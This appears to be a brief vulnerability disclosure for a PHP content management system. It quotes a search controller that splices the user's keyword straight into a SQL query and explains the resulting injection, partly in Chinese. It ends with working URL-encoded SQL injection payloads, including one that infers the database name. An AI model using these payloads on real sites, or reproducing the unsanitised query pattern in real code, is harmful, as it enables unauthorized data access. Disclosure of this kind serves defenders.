# SYCMS-sql

1. The hole location: / Application/Home/Controller/SearchController class. PHP lines 28

public function index($key='') {
        if(!$key) $this->error('关键词不能为空');
        $this->assign('keywords',$key);
        $count=M('Article')->where('status=1 AND title like \'%'.$key.'%\'')->count();
        $Page =new \Lib\Page($count,6);
        $Page->url='search/key/'.$key;
        $page =$Page->show();
        $this->assign('page',$page);
        $list_search=M('article a')
            ->join('__CATEGORY__ c ON a.cid=c.id')
            ->where('a.status=1 AND a.title like \'%'.$key.'%\'')
            ->field('a.id,a.cid,a.thumb,a.title,a.keywords,a.description,a.add_time,a.view,c.title as cate_title,c.name as cate_name')
            ->limit('0,6')
            ->limit($Page->firstRow.','.$Page->listRows)
            ->order('a.id DESC')
            ->select();
        $this->assign('list_search',$list_search);
        $this->display('index');
    }

This code is the implementation code of the foreground content search function. The function judges the submitted search parameters. When the search value is not empty, the parameters entered by the user are directly splicing into the SQL statement without parameter checking and filtering, resulting in SQL injection.


1.	在网站首页的搜索功能中输入参数进行搜索


 
点击搜索后将跳转到搜索功能模块
 
SQL注入payload：%%27%20and%201=1%20and%20%20%27%%27=%27
获取数据库名：
%%27%20and%201=if(database()%20like%20%27shanyucms%27,1,0)%20and%20%20%27%%27=%27
 
 
